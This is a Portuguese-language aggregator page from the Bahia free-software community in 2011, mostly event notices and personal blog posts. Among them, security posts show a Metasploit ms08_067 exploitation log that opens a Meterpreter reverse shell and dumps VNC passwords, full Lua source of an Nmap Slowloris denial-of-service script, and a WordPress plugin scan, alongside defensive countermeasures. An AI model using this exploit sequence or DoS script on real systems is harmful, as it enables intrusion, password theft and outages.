O Projeto Software Livre Bahia (PSL-BA) é um movimento aberto que busca, através da força cooperativa, disseminar na esfera estadual os ideais de liberdade difundidos pela Fundação Software Livre (FSF), possibilitando assim a democratização do acesso a informação, através dos recursos oferecidos pelo Software Livre. Esta busca tem seus alicerces fundados na colaboração de todos, formando um movimento sinérgico que converge na efetivação dos ideais de Liberdade, Igualdade, Cooperação e Fraternidade.
O Projeto Software Live Bahia é formado pela articulação de indivíduos que atuam em instituições publicas e privadas, empresas, governos ou ONGs, e demais setores da sociedade. Além disso o projeto não é subordinado a qualquer entidade ou grupo social, e não estabelece nenhuma hierarquia formal na sua estrutura interna.
Vicente Aguiar: Salve Salvador: + 462 de história, vida e contradições!
27 de Março de 2011, 0:00 - sem comentários aindaNo dia 29 de março, Salvador, a primeira capital do Brasil, fará "aniversário"! Apesar de Caramuru e os tupinambás já fazerem parte de uma nação anterior a nossa, a capital baiana fará + 462 de história, vida e muitas contradições!
Como bom baiano ("barrista"?!), não podia deixar de homenagear, nessa data, essa cidade sagarada e profana que sou tão apaixonado!
(Vista do Elavador Lacerda)
(Visão do Farol da Barra de uma lado diferente...)
(Imagem do Poeta Castro Alves na sua Praça)
(A energia do Pelô!)
(Arte nas ruas da Cidade)
(Tradição e Modernidade no por sol nas água de todos os santos)
Rafael Gomes: FLISOL Salvador 2011
27 de Março de 2011, 0:00 - sem comentários ainda
FLISoL — Festival Latinoamericano de Instalação de Software Livre — é o maior evento de difusão de Software Livre da América Latina e acontece paralelamente em várias cidades no Brasil e em toda a América Latina. Participe!
Dessa vez o evento será realizado junto ao Gnome Release Party e openSUSE Release Party, ou seja, será uma GRANDE festa!
Convido todos os interessados por software livre, principalmente os iniciantes, para esse evento que visa, primeiramente, divulgar o software livre para os leigos e, como sempre, congregar os companheiros da comunidade.
Teremos um auditório principal, com atividades voltadas para iniciantes e duas outras salas com palestras voltadas para o público
de desenvolvimento e outra para Administradores de infraestrutura (SysAdmin).
* Local do Evento: Faculdade Dom Pedro II
* Mapa de Localização: http://softwarelivre.org/flisol-ssa
* Endereço: Av. Estados Unidos nº 20 – Comércio. Salvador-BA
* Data: 09/04/2011
* Horário: De 09:00 às 18:00 horas
Não deixem de ir, espero vocês lá!
Alexandro Silva: Participe do FLISOL 2011 em Salvador
22 de Março de 2011, 0:00 - Um comentárioFLISoL — Festival Latinoamericano de Instalação de Software Livre — é o maior evento de difusão de Software Livre da América Latina e acontece paralelamente em várias cidades no Brasil e em toda a América Latina. Participe!
Dessa vez o evento será realizado junto ao Gnome Release Party e openSUSE Release Party, ou seja, será uma GRANDE festa!
Convido todos os interessados por software livre, principalmente os iniciantes, para esse evento que visa, primeiramente, divulgar o software livre para os leigos e, como sempre, congregar os companheiros da comunidade.
Site: http://softwarelivre.org/flisol-ssa/2011
Local: Faculdade Dom Pedro II
End: Av. Estados Unidos nº 20 – Comércio. Salvador-BA
Mapa de Localização: Google Maps
Infelizmente não poderei participar deste grande evento pois estarei no Web Security Forum.
Boa sorte a todos!!!
See:
Lucas Almeida Rocha: The Board in Distros
22 de Março de 2011, 0:00 - sem comentários ainda
The Board in GNOME 3
So far, testing The Board has been a complicated matter because it involved messing with jhbuild, build dependencies, compilation of a dozen of modules, etc. Those are fine for developers but not really for the people who just want to try the app. Here’s a summary of the progress made on the creation of distro packages for The Board.
Ubuntu. Robert Ancell initially created a PPA for The Board under the GNOME 3 team in Launchpad. Thanks Robert! I then fixed a few remaining build issues on the package and created a separate PPA for The Board. It contains packages for Natty. To install The Board, open a terminal and run:
$ sudo add-apt-repository ppa:the-board-team/dev-snapshots
$ sudo apt-get install the-board
You have to enable Ubuntu’s Universe repository. There are still a few issues with running The Board in Unity—blurred icon on panel, no status icon, etc. I’ll have to talk with the Unity team to know how The Board can be better integrated with Ubuntu’s new UX.
GNOME 3 Live CD. Thanks to the work of Andrew Wafaa, The Board packages are available for openSUSE. Frederic Crozat then integrated Andrew’s packages into the GNOME 3 Live CD. So it’s now easy to try The Board while having a sneak peak on GNOME Shell and other GNOME 3 goodies. As I said before, I’m still unsure on how to nicely integrate the app with GNOME Shell. The use of GTK+ status icon doesn’t really fit GNOME Shell’s UI design.
Fedora. Cosimo Cecchi has created Fedora Rawhide packages which still need to be updated for the latest release and reviewed. It should be available soon, I guess…
All in all, my hope is that those packages will allow more people to try The Board with minimum hassle. Keep in mind that The Board is still under heavy development and is not ready for end-users. For now, I’m looking forward to getting feedback, bug reports, and patches from insightful early testers and developers! For instance, Luc’s 15 minute review is an excellent example of the kind of feedback I’m looking for.
Alexandro Silva: MSF Meterpreter: Quebrando senhas do VNC
21 de Março de 2011, 0:00 - sem comentários ainda
Recentemente Chris Gate escreveu sobre o getvncpw, está feature do payload MSF Meterpreter quebra o algoritmo DES de senhas do *VNC.
Rob Fuller aka mubix reescreveu o módulo adicionando várias funcionalidades e melhorias, como ele ainda não está integrado ao MSF poderá ser baixado AQUI
Vamos aos testes
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 11.11.11.11:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:Portuguese – Brazilian
[*] Selected Target: Windows XP SP3 Portuguese – Brazilian (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 11.11.11.11
[*] Meterpreter session 2 opened (11.11.11.12:4444 -> 11.11.11.11:1032) at Mon Mar 21 15:57:38 -0300 2011
meterpreter > background
msf exploit(ms08_067_netapi) > use post/windows/gather/enum_vnc_pw
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > run
[*] Enumerating VNC passwords on VITIMA
[*] Checking UltraVNC…
[*] Checking WinVNC3_HKLM…
[*] Checking WinVNC3_HKCU…
[*] Checking WinVNC3_HKLM_Default…
[*] Checking WinVNC3_HKCU_Default…
[*] Checking WinVNC_HKLM_Default…
[*] Checking WinVNC_HKCU_Default…
[*] Checking WinVNC4_HKLM…
[+] WinVNC4_HKLM => 2101f4d191cf99ca => DcLabsgays on port: <== OLHE A SENHA AQUI ;-P
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[*] Checking TightVNC_HKLM_Control_pass...
[*] Post module execution completed
msf post(enum_vnc_pw) >
Com certeza este é um excelente módulo. Cuidado com seus VNCs jejejejejeje!!!!!
See:
Mônica Paz: I Simpósio de Educação Superior Virtual - UESB
21 de Março de 2011, 0:00 - sem comentários aindaDivulgação:
"As mudanças na sociedade atual exigem que cada vez mais a educação se insira no cenário das novas tecnologias. Seguindo esta tendência, a Uesb Virtual promove o I Simpósio de Educação Superior Virtual, nos dias 18, 19 e 20 de maio, com o intuito de discutir as novas tecnologias e metodologias aplicadas à educação superior à distância.
Na programação do Simpósio estão previstas diversas atividades, como painéis temáticos, mesas redondas, palestras, minicursos e apresentações de pôsteres acadêmicos, além de proporcionar aos participantes, uma noite de eventos culturais.
Dentre os minicursos oferecidos estão: “Criação e uso pedagógico de Blogs”; “O MSN como possibilidade pedagógica”; “As listas de discussão na construção do conhecimento”; “O uso pedagógico da Webquest”; “A escrita colaborativa no Google docs”; e “Produção de vídeos didáticos”.
Os que têm interesse em apresentar trabalhos, já podem fazer suas inscrições, até o dia 30 de março. Para mais informações, acesse a página da Uesb Virtual www.uabuesb.com.br ou entre em contato com o setor de Ensino a Distância (EAD), pelo telefone (77) 3425-9308. Confira aqui também a programação completa do Simpósio."
Alexandro Silva: Nmap: Script detecta servidores vulneráveis a ataques de DoS com o Slowloris
20 de Março de 2011, 0:00 - sem comentários ainda
O desenvolvimento de scripts para o Nmap anda a toda velocidade. Atendendo a pedidos na NSE Wiki o desenvolvedor Ange Gutek disponibilizou o draft de um script que detecta se o servidor está vulnerável a ataques de DoS usando o Slowloris.
De acordo com Gutek nesse momento o script fará o ataque sem saber se foi bem sucedido ou não, também não gera nenhuma saída e rodará para sempre. O monitoramento é feito através do modo debug (-d).
Sintaxe:
nmap –script http-slowloris –script-args [ARGUMENTOS] [ALVO]
Argumentos:
http-slowloris.threads – Número máximo de conexões concorrentes, se o alvo for Windows esse valor limita-se a 130.
http-slowloris.timeout – Tempo de espera antes de enviar novos dados httpheader. Padrão 100 segundos.
Gutek está convocando contribuidores para ajudar no aprimoramento do script.
Código:
description = [[
Tests a webserver against the Slowloris DoS attack, as it was described at Defcon 17 by RSnake
(see http://ha.ckers.org/slowloris/)This script opens and maintains numerous 'half-http' connections until the webserver runs out of ressources,
leading to a denial of service.
When the DoS condition is met the script then stops the attack and returns the payload datas as they could be usefull to tweak further filtering rules:
- Time taken until DoS
- Number of threads used
- Number of queries sent (or: amount of datas sent, in bytes)TODO
o Add a stopping mechanism
+ reserve a thread to monitor the webserver from time to time. If not responding, then stop.
o Analyze the threads: if the number of effective connections is lower than required by the script, maybe notify of a potential filtering rule ahead.
o Add user-supplied arguments:
+ threads, the max number of concurrent connections on the target: on Windows it seems to be limited to 130
+ timeout, time to wait before sending new http header datas in order to maintain the connection. Defaults to 100 seconds, but could be measured as slowloris.pl does]]
—
– @usage
– nmap –script http-slowloris –script-args http-slowloris.threads=500 http-slowloris.timeout=200
–
– @args http-slowloris.threads The max number of concurrent connections on the target: on Windows it seems to be limited to 130.
– @args http-slowloris.timeout Time to wait before sending new http header datas in order to maintain the connection. Defaults to 100 seconds.
–
– () output
– 80/tcp open http syn-ack
– | http-slowloris: Target was DoSed:
– | the attack took to succeed
– | with concurrent connections
– |_ with sentauthor = “Ange Gutek”
license = “Same as Nmap–See http://nmap.org/book/man-legal.html”
categories = {“dos”, “intrusive”}require “shortport”
require “stdnse”portrule = shortport.http
action = function(host, port)
math.randomseed(os.time())
local output,i
local threads = {}
nmap.registry.slowloris = {}
nmap.registry.slowloris['threads']=1— Threaded function ——————————————————————
local doHalfhttp = function(host,port)
local get_uri = math.random(100000, 900000) — we will query a random page
— create socket
local slowloris = nmap.new_socket()
local catch = function()
slowloris:close()
end
local try = nmap.new_try(catch)
try(slowloris:connect(host.ip, port))— Build a half-http header. Maybe the user-agent string should outline Nmap instead ?
local half_http = “GET /”..get_uri..” HTTP/1.1\r\n”
half_http = half_http..”Host: “..host.ip..”\r\n”
half_http = half_http..”User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n”
half_http = half_http..”Content-Length: 42\r\n”try(slowloris:send(half_http))
local count = nmap.registry.slowloris['threads'] — retrieve the number of already effective connectioncount = count + 1
nmap.registry.slowloris['threads']=count
stdnse.print_debug(1, “%s: USING %d THREADS)…”, SCRIPT_NAME, nmap.registry.slowloris['threads'])local queries = 2
while true do
— this is where we set the time to wait before maintaining the connection by sending a new line to the http header
— this value would be more efficient if it was just below the target timeout
stdnse.sleep(100)
try(slowloris:send(“X-a: b\r\n”))
queries = queries + 1
queries = queries * nmap.registry.slowloris['threads']
stdnse.print_debug(1, “%s: SENT %d QUERIES SO FAR (using %d threads)…”, SCRIPT_NAME, queries,nmap.registry.slowloris['threads'])
endend
— ————————————————————————————— Main
for i=1,1000 do — Number of threads to launch
local co = stdnse.new_thread(doHalfhttp, host, port)
threads[co] = true
end
return outputend
See:
Lucas Almeida Rocha: Selling my cameras
18 de Março de 2011, 0:00 - sem comentários ainda
Exposure by Eugene Yurevich (CC-BY-NC-ND)
After some consideration I decided to simplify my photographer life and sell both my DSLR and compact cameras to get one of those simpler yet fancy micro four-thirds cameras. I haven’t decided yet if I’ll get a GF-2 or a E-PL2.
The reason is very simple: even though I have a pretty good DSLR camera, I rarely use it because it’s just too inconvenient to carry it around. It just doesn’t work well for casual photography—at least for me. The reason I bought a compact was simply to have a decent HD video recorder. Anyway, here’s what I’m selling.
Canon 50D with 2 lenses. This is a just over 1-year old body that came with a Canon 17-85mm kit lens. I’m also including my 3-year old 50mm 1.8 lens and a 4GB compact flash. I guess I don’t have to say that this is an excellent DSLR camera, right? Price: £830
Panasonic Lumix TZ7. This is a point-and-shoot camera with an impressive 12x zoom. Definitely one of the best compacts I’ve ever used. Records 720p HD video with fairly good quality. I bought it less than a year ago. Price: £100
Both cameras are in very good shape. No scratches or anything. If you’re interested in buying one of the cameras, please contact me. I’ll give preference to buyers living in UK for practical reasons.
JavaBahia: II encontro do JavaBahia nas Faculdades
18 de Março de 2011, 0:00 - sem comentários aindaHorário: 9:00 às 12:00
Inscrição: http://www.jugevents.org/jugevents/event/show.html?id=35951
Entrada gratuita
1) Palestra: Iniciando com o Demoiselle 2.0
A versão 2.0 do Demoiselle foi liberada em dezembro de 2010 e está aderente à especificação Java EE 6. O núcleo do framework faz uso intenso do CDI (Dependency and Context Inject), enquanto suas extensões fazem uso das demais especificações (JSF2, JPA2, Validation, Servlet3 e EJB 3.1). Esta palestra aborda as principais funcionalidades do framework para auxiliar nos primeiros passos de uma aplicação. Você vai descobrir como é fácil e rápido decolar com a versão 2.0 do Demoiselle.
Palestrante: Cleverson Sacramento (ZyC)
Minicurriculo: é mestre em Sistemas e Computação pela Universidade Salvador (UNIFACS) e MBA em Gestão de Sistemas de Sistemas de Informação pela Faculdade de Tecnologia Empresarial (FTE). Trabalha na Coordenação Estratégica de Tecnologia do Serpro na regional Salvador. Faz parte da equipe de desenvolvedores dedicados ao projeto Demoiselle e é entusiasta da versão 2.0. É fundador do projeto opensource Rasea (http://rasea.org/) e gosta de escrever sobre tecnologia e outras coisas no seu blog (http://cleversonsacramento.wordpress.com/). É fã de uma boa pedalada e adora fazer um som com os amigos.
Mônica Paz: Delete - o direito de ser esquecido
18 de Março de 2011, 0:00 - sem comentários aindaA Revista A Rede apresentou a tradução "União Europeia vai obrigar redes sociais a ampliar proteção à privacidade dos usuários", artigo originalmnete publicado no Jornal The Guardian. O texto fala da possibilidade do usuário optar por ser "esquecido" evitando assim desconfortos, e prejuízos pessoais com o passar dos tempos.
O texto me lembrou o livro "Delete: The Virtue of Forgetting in the Digital Age" de Viktor Mayer-Schönberger. Este autor aponta "os riscos" da memória virtual, que diferente da nossa natural, que esquece, pode guardar informações em grandes quantidades e por tempo não determinado. Ele defende a adequação da memória digital a nossa.
Para "alertar" sobre "os riscos", Mayer-Schönberger apresenta o caso da Pirata Bebada, professora que perdeu o emprego por divulgar fotos de uma festa a fantasia, na qual aparecia consumindo bebida alcoólica. (Imaginem se chega nos ouvidos dele os nosso caso soteropolitano da pró Jack? Pelo menos rendeu outra profissão a esta vítima da proliferação de vídeos pitorescos na internet rsrs).
O problema é até válido, as soluções é que são intragáveis. Sabem o que Viktor sugere? Dentre outros medidas, como a prevenção e o medo constante antes das nossas publicações (até recomendo essa dica em palestras em colégios, mas sem tanto drama, juro), o autor defende metadados de datas de vencimento e medidas com a adição de DRM.
Sei que o interesse pelo livro deve ter morrido aqui, mas de qualquer forma segue um rápido resumo de Delete em PDF (que aborda mais a parte final do livro) feito por mim e por meu colega Rodrigo Cunha sobre o livro Delete que serviu para guiarmos a nossa apresentação em uma disciplina no semestre passado.
JavaBahia: II encontro do javaBAhia nas Faculdade
17 de Março de 2011, 0:00 - sem comentários aindaHorário: 9:00 às 12:00
Inscrição: http://www.jugevents.org/jugevents/event/show.html?id=35951
Entrada gratuita
1) Palestra: Iniciando com o Demoiselle 2.0
A versão 2.0 do Demoiselle foi liberada em dezembro de 2010 e está aderente à especificação Java EE 6. O núcleo do framework faz uso intenso do CDI (Dependency and Context Inject), enquanto suas extensões fazem uso das demais especificações (JSF2, JPA2, Validation, Servlet3 e EJB 3.1). Esta palestra aborda as principais funcionalidades do framework para auxiliar nos primeiros passos de uma aplicação. Você vai descobrir como é fácil e rápido decolar com a versão 2.0 do Demoiselle.
Palestrante: Cleverson Sacramento (ZyC)
Minicurriculo: é mestre em Sistemas e Computação pela Universidade Salvador (UNIFACS) e MBA em Gestão de Sistemas de Sistemas de Informação pela Faculdade de Tecnologia Empresarial (FTE). Trabalha na Coordenação Estratégica de Tecnologia do Serpro na regional Salvador. Faz parte da equipe de desenvolvedores dedicados ao projeto Demoiselle e é entusiasta da versão 2.0. É fundador do projeto opensource Rasea (http://rasea.org) e gosta de escrever sobre tecnologia e outras coisas no seu blog (http://cleversonsacramento.wordpress.com). É fã de uma boa pedalada e adora fazer um som com os amigos.
Alexandro Silva: Protegendo seu WebServer contra o Slowloris HTTP DoS
16 de Março de 2011, 0:00 - sem comentários ainda
O Slowloris é uma ferramenta de HTTP DoS desenvolvida pelo Rsnake. Seu funcionamento é bastante interessante porque ele cria sockets e envia requisições HTTPs válidas para a vitima continuamente em intervalos regulares, dessa forma ele tenta enganar o webserver evitando que estas conexões sejam fechadas.
Os webservers baseados em thread estão mais vulneráveis a este tipo de ataque por limitar a quantidades de threads por conexão. O Slowloris aguarda a conexão bem sucedida de todos os sockets para iniciar o ataque então se o alvo for um site muito acessado isso pode demorar um pouco.
Está técnica permite indisponibilizar o alvo aos poucos dificultando a detecção do ataque, se um usuário reiniciar uma conexão em curto espaço de tempo o acesso ao site alvo será estabelecido sem problemas. A ferramenta concorre com os acesso válidos nomalmente ganhando esta concorrência.
Seguem algumas soluções de proteção contra este tipo de ataque:
O active-responses do Ossec bloqueia a origem do ataque de forma automática sem a necessidade de configurações extras.
A utilização deste módulo é a solução dada por muitos sites.
A diretiva SecReadStateLimit é usada para limitar o número de threads concorrentes por IP.
See:
- Usando o http-wp-plugins do Nmap para detectar plugins do WordPress
- Infraestrutura para Aplicações Web Seguras parte 3 – Aplicação
- Servidores ssh sob ataque devido a falha no phpMyAdmin ( Atualizado )
- Instalando o Ossec-WUI ( Web Interface )
- Black Hat – Palestrante apresentará roteadores xDSL vulneráveis a ataque de DNS rebinding
Jamson Átila: pfSense RC1
16 de Março de 2011, 0:00 - sem comentários aindaFinal do mês de Janeiro foi divulgado nos mirros a nova versão do sistema, ainda em fase experimental, porém estável. O pfSense 2.0 RC1 traz inúmeras melhorias, dentre algumas que vou citar mais abaixo.
Algumas pessoas perguntam qual a minha opnião sobre a utilização de um firewall com interface WEB. Bom, particularmente sou suspeito pra falar, pois participo do projeto desde que fui apresentado pelos meus ‘gurus’ Rogério Moreira e Alexandro Silva. Adoro tecnologias open source que facilitam o dia a dia do Sysadmin, afinal temos tantas atividades, projetos e problemas a resolver que, se temos uma tecnologia disponível, estável, confiável e fácil de usar, porque preocuparmos com tarefas operacionais repetitivas?
O pfSense leva inovações ao Administrador da Rede facilitando a investigação do tráfego, análise de regras, planejamento da infraestrutura e resolução de problemas de rede. Sabemos que utilizar um firewall não é apenas configurar regras quando necessário, e sim monitorar suas atividades, extrair relatórios, gráficos em tempo real de maneira simples e rápida.
A ultima versão (1.2.3) foi lançada em 2009, como o sistema estava muito estável demorou um tempo até a versão atual 2.0 RC1, onde trouxe várias melhorias, ALGUMAS delas pude perceber instantâneamente:
Sistema Operacional
- Baseado no FreeBSD 8.1 – o ultimo era baseado no 7.2
- Boot mais rápido
- Além da opção de instalação Customizada (Padrão na versão anterior), possui agora:
- Restauração direta da configuração = arquivo .xml deve estar no diretório /tmp
- Instalação rápida – pulando as etapas como particionamento de disco e outros.
Visual
- Dashboard já integrado
- Mais temas
- Monitor de Balanceamento de carga
- Inclusão do menu HELP (Encaminhando para páginas: Wiki e desenvolvedores, base de dados de Bug, Foruns)
- Pacote Rate já integrado – Análise de tráfego de cada endereço na sua rede
Funcional
- Gerenciamento de usuários
- Integração com o AD
- Escalonamento de privilégios
- Tempo de acesso
- Adicionado a possibilidade de configurar uma VPN com L2TP
- Senha nos backups
- VPN PPTP suporta mais usuários
- 4 Endereços de DNS
- Disgnósticos de mais recursos: Discos, pacotes, processos
- Filtro de protocolos Layer 7
- Aplicação de Traffic Shaper individualmente nas interfaces
- Além de Suporte 3G
Lista completa dos novos recursos você pode conferir no endereço.
Se você ficou interessado em experimentar, pode baixar no link. Se deseja migrar logo o seu pfSense para a versão mais nova, aconselho testar antes, pois a boa prática é que seja um processo suave, mudança aos poucos. Os desenvolvedores do sistema informam que algumas partes da configuração é consideravelmente diferente nas versões 1.2.x, e suspeitam que possa haver alguns problemas de configuração na atualização, embora ainda não têm conhecimento de quaisquer problemas específicos até este momento, onde foi testado com uma grande variedade de configurações.
De todo modo vale a pena estudar minusciosamente a implantação do sistema, ter cautela é uma característica indispensável. E não esqueçam [O lançamento da versão estável oficial está muito próximo]
Alexandro Silva: Usando o http-wp-plugins do Nmap para detectar plugins do WordPress
15 de Março de 2011, 0:00 - sem comentários ainda
Foi anunciado recentemente um excelente script para o Nmap que permite detectar todos os plugins instalados no WordPress. A estrutura do script é bastante simples e ele se baseia em uma wordlist dos plugins existentes.
Abaixo segue um teste do script e as medidas preventivas contra o mesmo.
Inicialmente é necessário baixar o script e a wordlist
No Debian o script deve ser copiado para o diretório /usr/local/share/nmap/scripts e a wordlist para /usr/local/share/nmap/nselib/data
Sintaxe básica
nmap –script http-wp-plugins –script-arg [ARGUMENTO] [VITIMA]
ARGUMENTOS existentes:
http-wp-plugins.root – Define o diretório raiz do site. Não é obrigatório pois por padrão o script tentará localizar o diretório do WP.
http-wp-plugins.search – Define a quantidade de plugins a serem localizados. Por padrão o script tentará localizar os 100 mais populares. Para um true brute force use a opção “all”
Testando
sudo nmap –script http-wp-plugins –script-arg http-wp-plugins.search=all hackme
Resultado
Starting Nmap 5.51 ( http://nmap.org ) at 2011-03-15 00:47 BRT
Nmap scan report for hackme (0.0.0.0)
Host is up (0.00084s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
80/tcp open http
|_http-wp-plugins: akismet, add-to-any, facebook-comments-for-wordpress, wp-optimize
111/tcp open rpcbind
MAC Address: 00:00:00:00:00:00 (Alexos Computer Systems)Nmap done: 1 IP address (1 host up) scanned in 17.59 seconds
Contramedidas
Ossec
Com o active-responses habilitado o Ossec imediantamente bloqueará a tentativa de brute-force
Alterações no Apache
No arquivo de virtuahost do site crie uma diretiva Directory /var/www/wordpress/wp-content/plugins adicionando os seguintes parâmetros:
Order Deny,Allow
Deny from All
Options FollowSymLinks
AllowOverride None
Estas contramedidas previnirão contra qualquer tentativa de scanning do site, não permitindo que os plugins instalados sejam revelados.
Happy Hacking
See:
Leonardo Couto Conrado: Linux Magazine Community Edition 76 baixe já a sua
11 de Março de 2011, 0:00 - sem comentários aindaJá está no ar a Linux Magazine 76 Community Edition.Confira nesta edição os principais assuntos da Linux Magazine de março (Monitoramento e segurança) e leia artigos completos sobre ferramentas de backup para auxiliar na prevenção de falhas e perdas de dados e proteção de servidores web Apache com o módulo mod_security.
A Linux Magazine Community Edition surgiu em agosto de 2009. Trata-se de um arquivo em PDF com 30 páginas do conteúdo original da Linux Magazine do mês, disponível para download uma semana antes do lançamento da revista nas bancas – exclusivo para assinantes e cadastrados na newsletter.
O sumário da Community Edition contém a relação de todas as matérias da revista. Algumas são de livre acesso e outras são artigos que podem ser adquiridos pelo site. O material de livre acesso representa 30% do conteúdo da edição do mês, uma prática já adotada pela Linux Magazine. Pode-se navegar pelo documento, acessando o material gratuito ou adquirindo o material exclusivo em nosso site. Basta clicar para ser levado à página do artigo correspondente. Tudo isso antes mesmo de a revista chegar às bancas ou ser publicada no site.
A melhor parte é que você pode baixar o arquivo e enviar para quem você quiser. Por meio da licença Creative Commons, a Community Edition pode ser livremente copiada e distribuída. Assim, baixe, copie, envie para os seus amigos e faça parte de uma comunidade que não para de crescer. Participe de forma ativa na divulgação da tecnologia que mais traz benefícios para as pessoas e para o mercado em geral.
Quando a revista chegar às bancas, a Community Edition será disponibilizada gratuitamente para download para qualquer visitante do site. Mas você, assinante da newsletter, tem a exclusividade de acesso em primeira mão.
